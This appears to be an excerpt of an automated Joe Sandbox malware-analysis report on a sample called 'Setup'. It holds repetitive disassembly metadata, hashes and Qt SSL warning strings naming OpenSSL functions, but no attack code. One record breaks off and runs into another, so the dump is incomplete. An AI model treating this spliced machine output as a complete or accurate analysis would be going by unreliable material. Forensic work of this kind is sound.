                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40E49), ref: 00007FFBA1A30E84
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: BIO_new$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-1326833877
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3ED6B), ref: 00007FFBA1A36638
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3ED6B), ref: 00007FFBA1A3665D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3ED6B), ref: 00007FFBA1A36674
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: QSslSocket: cannot call unresolved function %s$X509_get_ext_d2i
                                                                                                                                                              • API String ID: 646154281-2088506088
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A4518A), ref: 00007FFBA1A32EA8
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A4518A), ref: 00007FFBA1A32ECD
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A4518A), ref: 00007FFBA1A32EE4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: OPENSSL_sk_value$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-387275786
                                                                                                                                                              • Opcode ID: 2f40f0cf27371a104878b2d324238a011ea552a07b2de2f34e409c7fd10a3d69
                                                                                                                                                              • Instruction ID: 26255b2dc8855b4564581205b98bab3d99cd2aa182bb7f18421e608cef9c26eb
                                                                                                                                                              • Opcode Fuzzy Hash: 2f40f0cf27371a104878b2d324238a011ea552a07b2de2f34e409c7fd10a3d69
                                                                                                                                                              • Instruction Fuzzy Hash: 4AF09095E0EA9281EBC3AB71E8112A53692BF84B10B809037DD6D4B721FE2C90458F00
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A459C3), ref: 00007FFBA1A31698
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A459C3), ref: 00007FFBA1A316BD
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A459C3), ref: 00007FFBA1A316D4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: DTLS_client_method$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-1639995455
                                                                                                                                                              • Opcode ID: c3d631a4ec2a29779fac3fea190be8c1523c3948fc439f1e6adb980b5e36a0c4
                                                                                                                                                              • Instruction ID: 23615f94cf9d4d649c5e1a11d81597b1b94db5033fea40cdbd13c558c999e33f
                                                                                                                                                              • Opcode Fuzzy Hash: c3d631a4ec2a29779fac3fea190be8c1523c3948fc439f1e6adb980b5e36a0c4
                                                                                                                                                              • Instruction Fuzzy Hash: BBF0B4A5F1EA8281EFC39BB5E8116A53392AF84B10B448537DD6D4B321FF2CD0458F00
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA1A40EBA), ref: 00007FFBA1A33688
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA1A40EBA), ref: 00007FFBA1A336AD
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA1A40EBA), ref: 00007FFBA1A336C4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: PEM_write_bio_RSAPrivateKey$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-3318088885
                                                                                                                                                              • Opcode ID: 854e36d8d18b47586313a958d846fe61e808a132512ce920ba796aab8fac126b
                                                                                                                                                              • Instruction ID: c4a4ac298b6504f36a8caf53b3a5d8ce05e098d8dfe3aea975f794228d5146c9
                                                                                                                                                              • Opcode Fuzzy Hash: 854e36d8d18b47586313a958d846fe61e808a132512ce920ba796aab8fac126b
                                                                                                                                                              • Instruction Fuzzy Hash: C2F09095F0EA5281EFD29B71E8126A62391BF84710F804037DD6D8B221EE2CD455CE00
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40F32), ref: 00007FFBA1A31E78
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40F32), ref: 00007FFBA1A31E9D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40F32), ref: 00007FFBA1A31EB4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: EVP_PKEY_set1_DH$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-1275201279
                                                                                                                                                              • Opcode ID: 875c53b4ffa68bc4bfaaf92163b13f4233b8aebcc212c8375a61a6348f1e52af
                                                                                                                                                              • Instruction ID: 97be4a5ee2121c032b6d5880c7227e190319e2bbb908bcc77d1002cd42dee1f5
                                                                                                                                                              • Opcode Fuzzy Hash: 875c53b4ffa68bc4bfaaf92163b13f4233b8aebcc212c8375a61a6348f1e52af
                                                                                                                                                              • Instruction Fuzzy Hash: 60F06DA5E0EA9281EB83AB35E8112A43252BF84B10F408237ED6D4B3A1EE2C94058E00
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA1A40F7E), ref: 00007FFBA1A33618
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA1A40F7E), ref: 00007FFBA1A3363D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA1A40F7E), ref: 00007FFBA1A33654
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: PEM_write_bio_PrivateKey$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-261683688
                                                                                                                                                              • Opcode ID: 583791d82ab606c00c0eb61f5390965f92c949a81c3dd2eb472e81905f01a0e6
                                                                                                                                                              • Instruction ID: 85ecea278e14bb61944e0a993078ebb2654bceccdc0c6471a7c1cc38f274703c
                                                                                                                                                              • Opcode Fuzzy Hash: 583791d82ab606c00c0eb61f5390965f92c949a81c3dd2eb472e81905f01a0e6
                                                                                                                                                              • Instruction Fuzzy Hash: 62F0B4A5F0E65281EFD39B71EC126A62791BF84710F809037DD6D4B261EF2CD415CE00
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40F1E), ref: 00007FFBA1A31E08
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40F1E), ref: 00007FFBA1A31E2D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40F1E), ref: 00007FFBA1A31E44
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: EVP_PKEY_new$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-74362941
                                                                                                                                                              • Opcode ID: 4288942be010ca33f9cd5d02423c0e32785b3b7d3370894191434379de0074c0
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40E39), ref: 00007FFBA1A320CD
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40E39), ref: 00007FFBA1A320E4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: EVP_des_ede3_cbc$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-1268385618
                                                                                                                                                              • Opcode ID: 0ef44486c8c8c6ed7a4009c3dec80155a927a24c0719a7a3a72c0a1356a7c695
                                                                                                                                                              • Instruction ID: 8c3fafeb6c5755ad4c2b976c129e358e408b928c227376aa86d6724c45abd69a
                                                                                                                                                              • Opcode Fuzzy Hash: 0ef44486c8c8c6ed7a4009c3dec80155a927a24c0719a7a3a72c0a1356a7c695
                                                                                                                                                              • Instruction Fuzzy Hash: 25F09095F0EB8281EBC39B71E8116A57392AF85B20B408037DD6D4A321FE2CD48A8E00
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A45955), ref: 00007FFBA1A34098
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A45955), ref: 00007FFBA1A340BD
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A45955), ref: 00007FFBA1A340D4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: QSslSocket: cannot call unresolved function %s$SSL_CTX_new
                                                                                                                                                              • API String ID: 646154281-2511137033
                                                                                                                                                              • Opcode ID: cd9ac0bae6f7690beffea8c0fc8595e1ff62e0b437573809fdccb546b680c606
                                                                                                                                                              • Instruction ID: 662676387e9242613257782cf18b8556a29b21be7bea3b7749b777d768c36c00
                                                                                                                                                              • Opcode Fuzzy Hash: cd9ac0bae6f7690beffea8c0fc8595e1ff62e0b437573809fdccb546b680c606
                                                                                                                                                              • Instruction Fuzzy Hash: FAF0B495F0EB8281EBC39B75E8016B57392AF85B10B408037DD6D4B721FE2CD0598E00
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA1997F60: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,00000000,00007FFBA19F5030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1997F8C
                                                                                                                                                                • Part of subcall function 00007FFBA1997F60: ?detach@QListData@@QEAAPEAUData@1@H@Z.QT5CORE(?,00000000,00000000,00007FFBA19F5030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1997F9A
                                                                                                                                                                • Part of subcall function 00007FFBA1997F60: ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,00000000,00007FFBA19F5030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1997FA6
                                                                                                                                                                • Part of subcall function 00007FFBA1997F60: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,00000000,00007FFBA19F5030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1997FB2
                                                                                                                                                                • Part of subcall function 00007FFBA1997F60: memmove.VCRUNTIME140(?,00000000,00000000,00007FFBA19F5030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1997FD7
                                                                                                                                                                • Part of subcall function 00007FFBA1997F60: ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE(?,00000000,00000000,00007FFBA19F5030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1998002
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00000000,00007FFBA19F4181), ref: 00007FFBA19F5033
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00000000,00007FFBA19F4181), ref: 00007FFBA19F5047
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00000000,00007FFBA19F4181), ref: 00007FFBA19F528E
                                                                                                                                                                • Part of subcall function 00007FFBA19F4650: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,00000000,00007FFBA19F507F,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA19F4681
                                                                                                                                                                • Part of subcall function 00007FFBA19F4650: ?detach@QListData@@QEAAPEAUData@1@H@Z.QT5CORE(?,00000000,00000000,00007FFBA19F507F,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA19F468F
                                                                                                                                                                • Part of subcall function 00007FFBA19F4650: ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,00000000,00007FFBA19F507F,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA19F469B
                                                                                                                                                                • Part of subcall function 00007FFBA19F4650: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,00000000,00007FFBA19F507F,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA19F46A7
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00000000,00007FFBA19F4181), ref: 00007FFBA19F5082
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00000000,00007FFBA19F4181), ref: 00007FFBA19F5096
                                                                                                                                                                • Part of subcall function 00007FFBA19EC670: ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,00007FFBA1A3EE56), ref: 00007FFBA19EC69B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
